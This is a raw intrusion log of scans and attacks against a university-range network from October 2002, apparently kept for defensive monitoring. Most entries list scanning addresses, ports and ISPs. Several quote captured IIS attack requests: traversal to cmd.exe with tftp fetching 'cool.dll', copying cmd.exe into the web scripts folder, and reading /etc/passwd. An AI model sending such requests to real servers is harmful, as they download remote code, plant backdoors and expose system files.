2002/10/20-10:10:09.34 24.184.80.222 () scannet for ports 139 445
2002/10/20-10:12:11.57 128.248.230.137 () scannet for ports 445
2002/10/20-10:19:45.27 24.191.180.161 () scannet for ports 445
2002/10/20-10:27:00.25 208.62.70.14 () scannet for ports 445
2002/10/20-11:27:11.15 61.218.152.35 () scannet for ports 80
2002/10/20-11:53:19.25 130.239.128.248 () scannet for ports 445 139
2002/10/20-12:06:33.89 207.50.60.14 () scannet for ports 445 139
2002/10/20-12:23:33.70 207.50.60.14 () scannet for ports 445 139
2002/10/20-13:10:40.20 24.222.29.247 () scannet for ports 445 139 80
2002/10/20-13:26:10.30 217.97.29.40 () scannet for ports 443
2002/10/20-13:29:31.98 65.28.210.166 () scannet for ports 80 57 21 others
2002/10/20-13:46:16.27 211.193.137.154 () scannet for ports 139 445
2002/10/20-13:49:33.90 211.193.137.154 () scannet for ports 445
2002/10/20-14:13:05.85 155.230.13.180 () scannet for ports 445
2002/10/20-14:35:51.15 68.59.150.222 () scannet for ports 445
2002/10/20-14:49:57.21 24.185.213.166 () scannet for ports 445
2002/10/20-16:35:06.07 68.97.11.144 () scannet for ports 1433
2002/10/20-17:05:25.40 217.85.145.73 () scannet for ports 80
2002/10/20-17:08:56.56 24.163.10.223 () scannet for ports 445 139
2002/10/20-17:38:47.63 24.188.217.8 () scannet for ports 445 139
2002/10/20-17:40:02.55 144.136.76.111 () scannet for ports 445
2002/10/20-17:41:33.99 24.188.217.8 () scannet for ports 445 139
2002/10/20-17:47:48.32 211.190.19.186 () scannet for ports 445
2002/10/20-18:58:45.92 24.192.11.238 () scannet for ports 445
2002/10/20-19:19:10.43 142.103.37.105 () scannet for ports 139 445
2002/10/20-19:54:53.38 24.208.183.228 () scannet for ports 7 ports
2002/10/20-20:11:32.46 218.234.87.199 () scannet for ports 445 139
2002/10/20-20:28:14.14 204.32.70.6 () scannet for ports 445
2002/10/20-20:36:16.25 218.237.73.45 () scannet for ports 445 139
2002/10/20-20:40:54.66 24.188.191.23 () scannet for ports 139 445
2002/10/20-20:46:52.83 211.248.178.178 () scannet for ports 445
2002/10/20-20:50:47.66 218.234.40.3 () scannet for ports 445
2002/10/20-21:06:22.04 24.163.171.37 () scannet for ports 445
2002/10/20-21:09:35.91 211.190.120.54 () scannet for ports 445 139
2002/10/20-21:10:02.81 211.49.150.103 () scannet for ports 139 445
2002/10/20-21:13:34.18 147.46.26.83 () scannet for ports 445
2002/10/20-21:25:15.29 165.194.27.166 () scannet for ports 445
2002/10/20-21:26:38.40 211.248.183.216 () scannet for ports 445
2002/10/20-21:28:15.70 211.208.196.43 () scannet for ports 445
2002/10/20-21:34:54.45 65.138.7.185 () scannet for ports 139
2002/10/20-21:44:57.98 68.5.97.180 () scannet for ports 445
2002/10/20-21:51:13.77 211.49.137.213 () scannet for ports 445
2002/10/20-21:55:23.43 142.173.46.33 () scannet for ports 445
2002/10/20-22:05:15.54 165.95.42.133 () scannet for ports 445
2002/10/20-22:05:15.54 211.193.153.250 () scannet for ports 445 139
2002/10/20-22:14:37.25 24.191.228.60 () scannet for ports 445
2002/10/20-22:31:15.37 210.221.101.251 () scannet for ports 445 139
2002/10/20-22:39:06.73 143.248.10.189 () scannet for ports 445 139
2002/10/20-23:04:42.17 209.174.31.248 () scannet for ports 445 139
2002/10/20-23:15:17.88 211.186.188.97 () scannet for ports 445
2002/10/20-23:15:47.79 210.117.89.244 () scannet for ports 445
2002/10/20-23:23:59.78 24.192.127.198 () scannet for ports 445
2002/10/20-23:30:41.03 211.53.110.194 () scannet for ports 445
2002/10/20-23:40:03.39 61.252.18.45 () scannet for ports 445 139
2002/10/20-23:48:00.93 24.192.86.168 () scannet for ports 445
2002/10/20-23:52:30.21 211.207.188.49 () scannet for ports 445
2002/10/21-00:01:30.12 210.117.109.181 () scannet for ports 445
2002/10/21-00:25:19.44 4.60.100.44 () scannet for ports 445
2002/10/21-00:35:36.06 211.208.160.172 () scannet for ports 445
2002/10/21-00:47:37.32 4.60.92.72 () scannet for ports 445
2002/10/21-01:05:31.77 24.117.19.178 () scannet for ports 139 445
2002/10/21-01:08:00.43 144.136.95.251 () scannet for ports 445
2002/10/21-01:11:22.72 128.227.205.18 () scannet for ports multiple ports
2002/10/21-01:36:48.96 24.208.178.53 () scannet for ports 41 ports
2002/10/21-01:52:45.46 164.100.223.111 () scannet for ports 139
2002/10/21-01:52:59.14 61.252.234.180 () scannet for ports 445
2002/10/21-02:01:33.71 143.248.201.129 () scannet for ports 445 139
2002/10/21-02:15:07.40 211.208.69.144 () scannet for ports 139 445
2002/10/21-02:48:02.57 131.128.147.78 () scannet for ports 445
2002/10/21-02:48:10.83 203.249.133.78 () scannet for ports 445
2002/10/21-02:58:14.45 24.186.116.234 () scannet for ports 445
2002/10/21-03:00:28.42 211.192.166.40 () scannet for ports 139 445
2002/10/21-03:02:30.57 211.192.166.90 () scannet for ports 139 445
2002/10/21-03:06:58.49 129.94.163.57 () scannet for ports 445 139
2002/10/21-03:11:22.37 166.104.50.35 () scannet for ports 445 139
2002/10/21-03:18:17.51 140.109.171.80 () scannet for ports 139 445
2002/10/21-03:21:52.17 211.186.169.93 () scannet for ports 445
2002/10/21-03:24:28.42 4.60.117.24 () scannet for ports 445
2002/10/21-03:30:12.02 143.248.148.184 () scannet for ports 445
2002/10/21-03:32:17.39 211.190.42.202 () scannet for ports 445 139
2002/10/21-03:32:37.88 68.5.110.152 () scannet for ports 445
2002/10/21-03:36:26.18 210.221.166.47 () scannet for ports 139 445
2002/10/21-04:01:01.85 211.208.209.223 () scannet for ports 139 445
2002/10/21-04:25:39.30 61.252.141.72 () scannet for ports 445 139
2002/10/21-06:15:44.19 66.56.1.248 () scannet for ports 445
2002/10/21-06:52:27.37 68.42.23.253 () scannet for ports 445 80
2002/10/21-07:13:44.86 211.183.1.91 () scannet for ports 445
2002/10/21-11:15:25.66 198.78.64.39 () scannet for port 1433
2002/10/21-13:01:46.10 213.121.14.87 () scannet for port 80
2002/10/21-14:53:53.65 141.157.218.164 () scannet for port 80 8080 1080 3128
2002/10/21-14:56:17.26 218.49.203.26 () scannet for port 445
2002/10/21-14:58:01.36 128.59.242.237 () scannet for port 445
2002/10/21-15:36:00.71 24.127.49.158 () scannet for port 80 445
2002/10/21-15:47:59.79 67.81.73.155 () scannet for port 80 445 139
2002/10/21-15:55:16.04 206.190.177.137 () scannet for port 139 445 80
2002/10/21-16:28:29.02 217.81.237.92 () scannet for port 1433
2002/10/21-17:12:39.83 61.76.9.250 () scannet for port 139
2002/10/21-18:56:55.55 64.48.13.175 () scannet for port 139
2002/10/21-20:42:04.87 218.4.51.134 () scannet for port 21
2002/10/21-21:10:12.09 210.94.37.123 () scannet for port 139 445
2002/10/21-21:17:12.18 210.176.225.106 () scannet for port 21
2002/10/21-22:17:39.87 218.103.18.161 () scannet for port 445 1433
2002/10/21-22:19:08.76 141.157.221.223 () scannet for port 1080 3128 80 8080
2002/10/21-23:21:34.10 156.34.221.170 () scannet for port 139
2002/10/22-02:09:46.22 63.230.214.49 () scannet for port 1433
2002/10/22-02:22:52.14 62.219.147.225 () scannet for port 445 80 139
2002/10/22-02:27:29.44 66.72.2.205 () scannet for port 80
2002/10/22-04:43:03.57 208.37.154.194 () scannet for port 139
2002/10/22-06:27:12.89 213.82.180.66 () scannet for port 443 80
2002/10/22-06:56:33.67 67.105.8.123 () scannet for port 1433
2002/10/22-07:14:01.90 67.105.8.123 () scannet for port 1433
2002/10/22-07:31:16.04 80.105.159.26 () scannet for ports 139
2002/10/22-08:01:31.40 12.33.116.39 () scannet for ports 139
2002/10/22-08:01:54.64 217.226.56.27 () scannet for ports 139
2002/10/22-08:26:57.58 195.111.64.229 () scannet for ports 139
2002/10/22-08:37:03.74 211.212.115.152 (HANARO Telecom,SEOUL,KR) attack 132.235.4.215 ports 139,445 till 09:07:53.13
2002/10/22-08:37:03.93 211.162.138.49 () scannet for ports 139
2002/10/22-08:47:29.45 211.211.118.63 (HANARO Telecom,SEOUL,KR) attack 132.235.4.215 ports 139,445 till 08:50:15.82
2002/10/22-08:48:03.74 61.255.22.250 (THRUNET-CATV-,KR) attack 132.235.4.205 ports 139,445 till 10:16:10.29
2002/10/22-08:49:07.21 211.211.118.63 (HANARO Telecom,SEOUL,KR) attack 132.235.4.219 ports 139,445 till 08:54:23.18
2002/10/22-08:55:37.41 4.65.189.235 (washdc3-ar6-4-65-189-235.washdc3.dsl-verizon.net) attack 132.235.4.209 ports 139,445 till 09:16:03
2002/10/22-08:56:19.55 211.195.48.141 (HANARO Telecom,SEOUL,KR) attack 132.235.4.22 ports 139,445 till 09:01:15.70
2002/10/22-09:00:01.08 211.208.179.180 (HANARO Telecom,SEOUL,KR) attack 132.235.4.205 ports 139,445 till 09:54:32.70
2002/10/22-09:01:23.19 217.223.145.37 (host37-145.pool217223.interbusiness.it) attack 132.235.4.213 ports 139,445 till 09:24:27.66
2002/10/22-09:04:03.23 211.196.141.226 (HANARO Telecom,SEOUL,KR) attack 1 132.235.4.201 ports 139,445 till 21:01:09.80
2002/10/22-09:07:05.38 61.248.224.244 (Onse Telecom,KYONGI,KR) attack 132.235.4.222 ports 139,445 till 09:49:27.04
2002/10/22-09:11:05.72 24.232.31.112 () scannet for ports 139
2002/10/22-09:11:46.89 211.209.17.145 (HANARO Telecom,SEOUL,KR) attack 132.235.4.214 ports 139,445 till 09:13:09.67
2002/10/22-09:22:19.05 203.228.88.202 () scannet for ports 139
2002/10/22-09:25:05.61 217.216.10.117 (cliente-217216010117.cm128.senpa.supercable.es) attack 132.235.4.68 port 445 till 09:34:03.51
2002/10/22-09:29:24.19 61.72.89.223 () scannet for ports 139
2002/10/22-09:31:14.19 140.116.118.32 () scannet for ports 139
2002/10/22-09:34:25.85 61.219.132.98 (61-219-132-98.HINET-IP.hinet.net) attack 132.235.4.68 ports 139,445 till 10:06:31.19
2002/10/22-09:36:21.65 61.83.199.128 (Korea Telecom,SOUL,KR) attack 132.235.4.68 ports 139,445 till 09:44:04.21
2002/10/22-09:40:58.21 24.170.152.25 (user-0cal60p.cable.mindspring.com) attack 132.235.4.212 port 139,445 till 11:24:59.
2002/10/22-09:53:05.02 212.253.74.107 () scannet for ports 139
2002/10/22-10:00:16.96 61.35.160.171 (Cable Modem Provider ,PUSON,KR) attack 132.235.4.206 ports 139,445 till 10:09:36.37
2002/10/22-10:04:12.43 211.215.186.196 (HANARO Telecom,SEOUL,KR) attack 132.235.4.20 ports 139,445
2002/10/22-10:08:28.18 217.79.118.35 (Griffin Internet Contact Role,DErby,UK) attack 132.235.4.20 ports 139,445 till 11:29:34.03
2002/10/22-10:13:11.23 211.177.65.36 (HANARO Telecom,SEOUL,KR) attack 132.235.4.203 ports 139,445 till 10:16:01.61
2002/10/22-10:21:53.59 61.219.132.98 (61-219-132-98.HINET-IP.hinet.net) attack 132.235.4.207 ports 139,445 till 10:47:36.94
2002/10/22-10:30:30.62 200.151.16.150 () scannet for ports 139
2002/10/22-10:42:52.79 200.165.66.16 () scannet for ports 139
2002/10/22-10:50:54.00 200.60.199.9 () scannet for ports 139
2002/10/22-10:53:34.91 211.177.196.230 () scannet for ports 139
2002/10/22-10:57:59.38 211.254.138.35 (CCEJ-HiTEL Information Educational,SEOUL,KR) attack 132.235.4.68 port 445 till 11:08:02.62
2002/10/22-11:04:15.49 200.60.196.89 () scannet for ports 139
2002/10/22-11:18:01.17 209.240.170.36 () scannet for ports 139
2002/10/22-11:22:48.72 211.198.236.49 (KOREA TELECOM KWANGJU NODE,KR) attack 132.235.4.216 port 445
2002/10/22-11:24:21.59 61.104.217.242 (THRUNET-CATV-KANGNAMOWN-KR,SOUL,KR) attack 132.235.4.14 till 14:17:43.86
2002/10/22-11:27:19.49 202.88.227.123 () scannet for ports 139
2002/10/22-12:01:13.30 129.219.38.95 () scannet for ports 443
2002/10/22-12:07:29.31 200.214.140.227 () scannet for ports 139
2002/10/22-12:18:16.43 61.79.46.173 () scannet for ports 139
2002/10/22-12:20:39.42 211.91.143.38 (China United Telecommunications Corporation,BEIJING,CN) attack 132.235.4.1 ports 139,445 till 13:21:35.98
2002/10/22-12:37:21.57 217.128.48.138 (APoitiers-106-1-2-138.abo.wanadoo.fr) attack 132.235.4.17 ports 139,445 till 12:59:23.73
2002/10/22-13:10:47.59 61.35.227.30 () scannet for ports 139
2002/10/22-13:14:56.95 24.101.207.209 (CPE3438373837383932.cpe.net.cable.rogers.com) attack 132.235.4.210 port 445 til 17:09:37
2002/10/22-13:39:35.62 12.98.120.48 () scannet for ports 139
2002/10/22-13:44:48.39 217.211.211.17 () scannet for ports 139
2002/10/22-13:47:26.69 168.70.219.72 () scannet for ports 139
2002/10/22-13:57:34.08 212.179.102.99 (cablep-179-102-99.cablep.bezeqint.net) attack 132.235.1.[89,90] ports 139,445 till 14:17:06.48
2002/10/22-13:58:25.35 67.33.114.37 () scannet for ports 139
2002/10/22-14:00:28.17 212.179.102.99 () scannet for ports 80 445 139
2002/10/22-14:17:31.82 61.133.74.47 (shandong price bureau,CN) attack 132.235.4.68 ports 139,445 till 17:22:14.02
2002/10/22-15:00:10.25 195.14.205.219 () scannet for ports 139
2002/10/22-15:15:43.24 217.230.208.82 () scannet for ports 80 57
2002/10/22-15:30:36.10 63.127.208.132 () scannet for ports 139
2002/10/22-15:45:00.25 212.10.126.224 () scannet for ports 139
2002/10/22-15:45:08.88 65.185.39.85 () scannet for ports 139 445
2002/10/22-15:51:22.05 212.179.102.99 () scannet for ports 139 445 80
2002/10/22-15:52:50.19 200.158.14.194 () scannet for ports 139
2002/10/22-15:53:10.46 212.179.102.99 (cablep-179-102-99.cablep.bezeqint.net) attack 132.235.1.[89,90] ports 139,445 till 16:16:09.74
2002/10/22-16:13:07.41 66.36.136.35 () scannet for ports 135 139 445
2002/10/22-17:07:20.44 24.203.112.43 () scannet for ports 139 445 80
2002/10/22-17:08:06.69 24.203.112.43 (modemcable043.112-203-24.mtl.mc.videotron.ca) attack 132.235.1.89 ports 139,445 till 17:16:40.75
2002/10/22-17:08:06.69 24.203.112.43 (modemcable043.112-203-24.mtl.mc.videotron.ca) attack 132.235.1.90 ports 139,445 till 17:16:40.75
2002/10/22-17:09:20.00 24.203.112.43 (modemcable043.112-203-24.mtl.mc.videotron.ca) scannet ports 139 445 til 17:23:06
2002/10/22-17:11:47.21 200.148.6.83 () scannet for ports 139
2002/10/22-18:36:25.23 216.58.90.207 () scannet for ports 1433
2002/10/22-18:44:45.27 66.170.35.90 () scannet for ports 139
2002/10/22-19:49:03.05 24.207.169.204 () scannet for ports 139
2002/10/22-20:22:29.20 66.72.2.205 () scannet for ports 80
2002/10/22-21:07:42.30 208.33.152.30 () scannet for ports 139 445
2002/10/22-21:14:28.35 208.33.152.30 (user30.net125.va.sprint-hsd.net) attack 132.235.1.90 ports 139,445 till 23:16:54.99
2002/10/22-23:00:57.56 137.43.25.84 () scannet for ports 80 443
2002/10/23-01:08:19.09 67.34.4.221 () scannet for ports 139 445
2002/10/23-04:18:54.71 80.132.154.16 (p50849A10.dip.t-dialin.net) 1st of 210 different IPs connect to port 4665 on a printer.
2002/10/23-06:04:56.39 61.142.131.43 () scannet for ports 80 443
2002/10/23-07:14:44.87 158.123.212.2 () scannet for ports 80
2002/10/23-08:49:53.69 62.219.148.96 () scannet for ports 139 80 445
2002/10/23-10:12:32.53 217.96.28.107 () scannet for ports 139
2002/10/23-10:15:09.70 80.15.137.223 () scannet for ports 139
2002/10/23-10:20:12.51 200.168.76.91 () scannet for ports 139
2002/10/23-10:51:07.26 62.251.206.198 () scannet for ports 139
2002/10/23-10:53:13.87 24.78.145.84 () scannet for ports 139
2002/10/23-11:06:10.88 200.206.157.253 () scannet for ports 111
2002/10/23-11:06:40.51 203.75.12.104 () scannet for ports 139
2002/10/23-11:27:09.01 145.18.244.93 () scannet for ports 1433
2002/10/23-11:40:33.04 209.79.223.64 () scannet for ports 139
2002/10/23-11:40:40.48 66.0.15.163 () scannet for ports 139
2002/10/23-11:48:32.54 210.110.86.34 () scannet for ports 139
2002/10/23-12:28:32.85 202.69.162.13 () scannet for ports 139
2002/10/23-12:49:57.38 148.240.170.244 () scannet for ports 139
2002/10/23-12:55:01.77 218.165.168.185 () scannet for ports 139
2002/10/23-13:14:47.03 217.3.115.59 () scannet for ports 139
2002/10/23-13:19:59.50 216.241.5.137 () scannet for ports 139
2002/10/23-13:20:12.92 80.37.216.153 () scannet for ports 139
2002/10/23-13:30:42.99 200.169.83.143 () scannet for ports 139
2002/10/23-13:41:26.21 200.65.243.221 (dup-200-65-243-221.prodigy.net.mx) scannet for ports 139
2002/10/23-13:44:44.28 200.72.64.142 (notebook.topservice.d2g.com) scannet for ports 139
2002/10/23-13:53:08.60 65.81.167.186 (adsl-81-167-186.asm.bellsouth.net) scannet for ports 139
2002/10/23-14:49:03.81 66.123.173.133 (adsl-66-123-173-133.dsl.sntc01.pacbell.net) scannet for ports 139
2002/10/23-15:15:56.62 219.241.102.96 () scannet for ports 139
2002/10/23-15:28:14.00 207.178.98.85 (ppp-85-98-ks1.hubris.net) scannet for ports 139
2002/10/23-15:29:13.37 207.195.97.185 (hsdbsk207-195-97-185.sasknet.sk.ca) scannet for ports 139
2002/10/23-16:38:35.48 128.210.63.233 (testnt-33.adpc.purdue.edu) scannet for ports 1433
2002/10/23-18:53:36.70 198.86.95.94 () scannet for ports 80
2002/10/23-20:18:11.71 200.78.148.14 () scannet for ports 443 80
2002/10/23-21:15:06.57 66.189.203.228 (ts46-01-qdr996.ykma.wa.charter.com) scannet for ports 139
2002/10/23-21:50:01.02 216.123.27.102 () scannet for ports 111
2002/10/23-23:38:38.31 80.33.110.192 (192.Red-80-33-110.pooles.rima-tde.net) scannet for ports 80
2002/10/24-00:24:33.33 210.54.31.26 (p0rn5tar.net4u.co.nz) scannet for ports 139 80 445
2002/10/24-00:46:22.48 66.202.58.171 (host-66-202-58-171.ind.choiceone.net) scannet for ports 1433
2002/10/24-01:27:08.10 217.125.26.151 (217-125-26-151.uc.nombres.ttd.es) scannet for ports 80
2002/10/24-01:59:02.90 217.81.61.153 (pD9513D99.dip.t-dialin.net) attack web server w/ GET /_mem_bin/..(etc)/cmd.exe?/c+tftp%20-i%20192.168.10040%20GET%20cool.dll%20c
2002/10/24-03:20:53.36 151.200.218.99 () scannet for ports 80
2002/10/24-06:06:49.22 64.157.32.1 (dpclt032001.direcpc.com) probe 132.235.2.1 : 53 til 2002/10/25-03:16:59.67
2002/10/24-07:39:07.27 202.95.150.209 (POP SBY RADIO GATEWAY,ID) 1. attack 132.235.19.164:80 w/command
2002/10/24-07:39:07.27 202.95.150.209 (POP SBY RADIO GATEWAY,ID) 2. /cmd.exe?/c+tftp%20-i%2010.112.1.190%20GET%20cool.dll
2002/10/24-08:10:13.05 200.206.134.52 () scannet for port 139
2002/10/24-08:10:17.84 61.217.137.40 () scannet for port 139
2002/10/24-08:22:00.27 68.0.52.39 () scannet for port 139
2002/10/24-08:50:35.59 200.158.150.237 () scannet for port 139
2002/10/24-08:53:33.48 80.26.74.35 () scannet for port 139
2002/10/24-09:00:58.04 200.180.44.208 () scannet for port 139
2002/10/24-09:01:28.22 218.154.125.162 () scannet for port 139
2002/10/24-09:27:05.50 218.163.24.92 () scannet for port 139
2002/10/24-09:30:26.21 216.155.94.72 () scannet for port 139
2002/10/24-10:02:31.99 12.134.1.116 () scannet for port 139
2002/10/24-10:09:24.08 130.243.13.136 () scannet for port 1433 80
2002/10/24-10:15:54.39 200.64.236.225 () scannet for port 139
2002/10/24-10:18:28.85 212.235.36.170 (Netvision's cables service,IL) 2. etc until 1530 2002/10/24-20:32:41.95
2002/10/24-10:29:20.92 216.190.38.174 () scannet for port 139
2002/10/24-11:11:19.71 203.90.76.37 () scannet for port 139
2002/10/24-11:27:49.85 200.62.137.74 () scannet for port 139
2002/10/24-11:40:08.00 213.106.54.112 () scannet for port 139
2002/10/24-12:22:33.23 206.190.177.137 () scannet for port massive 139 445 80
2002/10/24-12:23:27.09 207.14.78.159 () scannet for port 139
2002/10/24-13:06:11.05 61.230.0.32 () scannet for port 139
2002/10/24-14:00:13.58 216.78.153.90 () scannet for port 139
2002/10/24-14:03:45.13 64.157.37.159 (dpclt037159.direcpc.com) probe 132.235.2.1 : 53
2002/10/24-14:20:39.50 212.235.36.170 (Netvision's cables service,IL) 1. attack 132.235.18.16:80 :GET /scripts/sensepost.exe?/c+echo%
2002/10/24-14:34:02.85 166.114.117.182 () scannet for port 139
2002/10/24-15:57:26.61 12.25.164.168 () scannet for port 139 445
2002/10/24-16:20:29.17 213.121.13.67 () scannet for port 139 445
2002/10/24-16:25:46.22 200.204.5.57 () scannet for port 139
2002/10/24-17:06:59.43 200.46.89.226 () scannet for port 80
2002/10/24-17:19:35.68 131.216.72.39 () scannet for port 1433
2002/10/24-17:19:50.54 217.81.121.232 () scannet for port 139
2002/10/24-18:18:17.83 24.208.177.125 (dhcp024-208-177-125.columbus.rr.com) probe several ips for port 631 til 23:57:39.29
2002/10/24-20:15:46.80 218.223.85.239 () scannet for port 139
2002/10/24-20:25:20.73 64.157.35.121 (dpclt035121.direcpc.com) probe 132.235.2.1 : 53
2002/10/24-21:26:46.14 24.130.136.167 () scannet for port 445 80
2002/10/25-01:46:12.63 210.83.142.163 () scannet for port 443 80
2002/10/25-03:47:04.65 61.63.154.25 () scannet for port 80
2002/10/25-03:59:53.55 64.157.36.35 (dpclt036035.direcpc.com) probe 132.235.2.1 : 53
2002/10/25-05:45:39.68 129.105.70.69 () scannet for port 445 139
2002/10/25-08:48:04.21 165.121.32.195 (user-2ini863.dialup.mindspring.com) scannet for ports 445
2002/10/25-09:06:11.83 210.221.25.204 (s210-221-25-204.thrunet.ne.kr) scannet for ports 445
2002/10/25-09:30:42.66 66.114.155.192 (pia155-192.pioneernet.net) scannet for ports 139
2002/10/25-09:53:40.27 211.190.19.103 () scannet for ports 445
2002/10/25-10:03:46.40 212.120.120.106 (cp282144-a.schoo1.lb.home.nl) scannet for ports 1433
2002/10/25-10:10:53.40 63.198.239.77 () scannet for ports 139
2002/10/25-10:15:34.04 61.177.57.130 (61-223-27-52.HINET-IP.hinet.net) scannet for ports 80 443
2002/10/25-10:54:04.12 211.208.175.197 () scannet for ports 445
2002/10/25-10:54:52.95 24.102.124.234 (CPE00045a9a518b.cpe.net.cable.rogers.com) scannet for ports 445
2002/10/25-11:09:32.56 220.75.240.140 () scannet for ports 139
2002/10/25-11:44:58.60 200.28.129.119 (119-129-28.dial.terra.cl) scannet for ports 139
2002/10/25-11:47:07.82 217.208.70.68 (h68n2fls33o891.telia.com) scannet for ports 80
2002/10/25-11:53:42.96 129.128.129.136 (red.trlabs.ualberta.ca) scannet for ports 1433
2002/10/25-12:10:57.44 202.142.78.163 () scannet for ports 139
2002/10/25-13:06:26.02 155.58.31.208 () scannet for ports 1433
2002/10/25-13:18:41.60 65.148.112.150 (0-1pool112-150.nas45.los-angeles2.ca.us.da.qwest.net) scannet for ports 139
2002/10/25-14:07:01.19 200.54.28.246 () scannet for ports 139
2002/10/25-14:07:26.97 212.142.147.174 (eu147-174.clientes.euskaltel.es) scannet for ports 139
2002/10/25-14:14:08.47 140.111.134.71 (serv7.waes.ilc.edu.tw) scannet for ports 139
2002/10/25-14:18:33.65 200.199.134.236 () scannet for ports 139
2002/10/25-14:23:32.28 61.223.27.52 (docs34-219.menta.net) scannet for ports 139
2002/10/25-14:28:12.47 213.97.94.136 (213-97-94-136.uc.nombres.ttd.es) scannet for ports 139
2002/10/25-15:03:42.87 192.135.11.194 (prpc94.fis.unipr.it) scannet for ports 139
2002/10/25-15:45:37.19 200.151.198.139 (SHASTA198139.ig.com.br) scannet for ports 139
2002/10/25-17:30:56.83 66.110.160.156 (adsl-66.110.160-156.globetrotter.net) scannet for ports 139 21 80 445
2002/10/25-19:08:26.31 208.221.169.2 () scannet for ports 58083 80 21 57
2002/10/25-19:09:09.16 208.221.169.2 (USA Teleport Inc.,North Miami Beach FL,US) 1. attack web server with command:
2002/10/25-19:09:09.16 208.221.169.2 (USA Teleport Inc.,North Miami Beach FL,US) 2. HEAD /cgi-bin/ssi//%2(...)2e/etc/passwd?/c+dir+c:\
2002/10/26-01:04:43.10 137.82.16.50 () scannet for ports 1433
2002/10/26-04:38:20.85 212.194.30.116 (lns02v-7-116.w.club-internet.fr) scannet for ports 21
2002/10/26-06:06:07.39 134.214.86.172 (eur-adm.insa-lyon.fr) scannet for ports 80 443
2002/10/26-06:06:22.29 64.124.124.31 () scannet for ports 80
2002/10/26-09:39:15.25 130.94.240.218 () scannet for ports 80
2002/10/26-09:39:19.16 130.94.240.218 (Verio, Inc.,Englewood CO US) 1. attack web server w/ command:
2002/10/26-09:39:19.16 130.94.240.218 (Verio, Inc.,Englewood CO US) 2. c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe
2002/10/26-09:39:51.82 62.57.33.219 (adsl-63-198-239-77.dsl.lsan03.pacbell.net) scannet for ports 21
2002/10/26-10:18:20.36 24.214.37.14 (user-24-214-37-14.knology.net) scannet for ports 80 445
2002/10/26-13:39:23.71 24.25.185.111 (grayme-cmt1-24-25-185-111.maine.rr.com) scannet for ports 80 443
2002/10/26-16:28:16.42 211.91.218.140 () scannet for ports 8080 1080 8000
2002/10/26-17:35:58.58 24.229.29.65 (PenTeleData Inc. - Cable, PA,US) 1. attack web server w/ command:
2002/10/26-17:35:58.58 24.229.29.65 (PenTeleData Inc. - Cable, PA,US) 2. c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe
2002/10/26-17:36:19.36 24.229.29.65 () scannet for ports 80
2002/10/26-18:58:52.30 211.144.103.19 () scannet for ports 21
2002/10/26-21:19:05.40 137.229.59.242 (59-242.lathrop.uaf.edu) scannet for ports 139 80 445
2002/10/26-21:55:09.39 211.21.184.148 (www.ad.com.tw) scannet for ports 80
2002/10/26-23:16:45.16 168.191.184.235 (sdn-ar-002txtempP329.dialsprint.net) scannet for ports 80 8000 8001 8080 8090 81 8888 1080 3128 4480 6588
2002/10/27-00:46:08.41 167.206.174.19 (guardian.rvcschools.org) scannet for ports 1433
2002/10/27-00:50:00.07 128.119.153.23 (peoples-market.stuaf.umass.edu) scannet for ports 1433
2002/10/27-06:50:57.12 210.71.57.129 () scannet for ports 80 443
2002/10/27-08:55:35.62 213.22.27.187 (a213-22-27-187.netcabo.pt) scannet for ports 139
2002/10/27-10:12:16.27 203.195.175.166 (203-195-175-166.now-india.net.in) scannet for ports 445
2002/10/27-10:13:14.37 203.195.159.11 (203-195-159-11.now-india.net.in) scannet for ports 80
2002/10/27-10:47:36.37 195.175.113.197 (nwusr-8644.dial-in.ttnet.net.tr) try to anon ftp /etc/passwd file.
2002/10/27-13:33:21.92 213.184.174.85 () scannet for ports 445 139
2002/10/27-15:14:13.56 81.48.34.174 (AMontsouris-107-1-2-174.abo.wanadoo.fr) scannet for ports 80 445 135 139
2002/10/27-15:21:31.60 24.208.178.53 (dhcp024-208-178-053.columbus.rr.com) scannet for ports 44 ports
2002/10/27-16:21:37.57 168.126.241.66 () scannet for ports 21
2002/10/27-17:41:17.14 68.55.241.250 (pcp313644pcs.woodln01.md.comcast.net) scannet for ports 80
2002/10/27-21:05:38.79 217.128.142.68 (ABordeaux-201-1-1-68.abo.wanadoo.fr) scannet for ports 1433
2002/10/27-21:46:58.81 141.157.219.188 (pool-141-157-219-188.ny325.east.verizon.net) scannet for ports 80 8080 1080 3128
2002/10/27-23:44:38.19 129.63.211.144 (she211-144.uml.edu) scannet for ports 80
2002/10/28-01:09:26.41 80.205.215.90 (host90-215.pool80205.interbusiness.it) scannet for ports 80
2002/10/28-01:26:36.17 203.77.19.194 (host194.2037719.gcn.net.tw) scannet for ports 80 443
2002/10/28-02:18:41.17 66.245.35.150 (user-11fa8sm.dsl.mindspring.com) scannet for ports 445 139 80
2002/10/28-04:19:44.25 172.185.221.90 (ACB9DD5A.ipt.aol.com) scannet for ports 21 80 57
2002/10/28-04:22:26.27 172.185.221.90 (ACB9DD5A.ipt.aol.com) attack web server: HEAD /cgi-bin/ssi//%2e%2e/%2e%2e/etc/passwd?/c+dir+c:
2002/10/28-05:46:16.93 211.238.207.36 () scannet for ports 111
2002/10/28-06:29:02.23 80.143.166.121 (p508FA679.dip.t-dialin.net) scannet for ports 137 139
2002/10/28-06:29:19.89 212.155.193.161 () scannet for ports 139 135
2002/10/28-06:32:41.44 213.2.155.68 (host4.tms-advertising.co.uk) scannet for ports 80
2002/10/28-07:16:48.58 151.1.141.53 () scannet for ports 80 443
2002/10/28-07:50:38.69 80.143.166.121 (p508FA679.dip.t-dialin.net) scannet for ports 80 139 445 135
2002/10/28-07:52:03.69 80.143.166.121 (p508FA679.dip.t-dialin.net) heavy attack on 132.235.1.[89,90] ports 445,135 til 08:30:02.04
2002/10/28-08:15:38.65 61.149.0.116 () scannet for ports 8080 80 3128
2002/10/28-08:25:15.48 211.207.15.93 () scannet for ports 21, anon ftp attacks
2002/10/28-08:29:04.42 12.213.29.209 (12-213-29-209.client.attbi.com) scannet for ports 1433
2002/10/28-09:25:42.00 210.183.104.247 () scannet for ports 139
2002/10/28-09:26:26.62 213.201.150.210 () scannet for ports 139
2002/10/28-09:43:45.87 212.77.210.55 () scannet for ports 139
2002/10/28-09:57:35.79 209.163.98.83 (209-163-98-83.dialup.qis.net) scannet for ports 139
2002/10/28-10:29:01.54 217.144.7.85 () scannet for ports 139
2002/10/28-10:34:37.74 80.59.170.87 (87.Red-80-59-170.pooles.rima-tde.net) scannet for ports 139
2002/10/28-11:37:54.06 212.194.73.181 (lns04a-2-181.w.club-internet.fr) scannet for ports 21
